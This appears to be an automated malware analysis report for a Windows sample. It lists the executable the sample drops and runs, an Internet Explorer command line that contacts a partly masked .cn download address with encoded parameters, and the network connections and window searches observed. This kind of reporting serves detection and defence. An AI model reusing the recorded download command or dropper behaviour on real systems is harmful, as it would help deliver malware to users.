Technical Information
Malicious functions:
Creates and executes the following:
- C:\10172.exe -r
Executes the following:
- %PROGRAM_FILES%\Internet Explorer\IEXPLORE.EXE http://z1.#5885.cn//down6/down/?s=############################################ 12:07:01 PM&v=C1ADDEE4AFB2A6E7&n=C59AC1BBB5D9B7C6B9D6C8B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B175B2BABBB4BAADADA5B674BAADB775B3AFB7A4B373B8A6ABA5A6B375B1BA7AB3B7AEA5A4B5AAB8ADA3AFA2B1A8ABB4B1
Modifies file system :
Creates the following files:
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\KHMHGZ4F\CARAK3V5
- C:\10172.exe
Network activity:
Connects to:
- 'z1.#5885.cn':80
- 'localhost':1035
UDP:
- DNS ASK z1.#5885.cn
Miscellaneous:
Searches for the following windows:
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
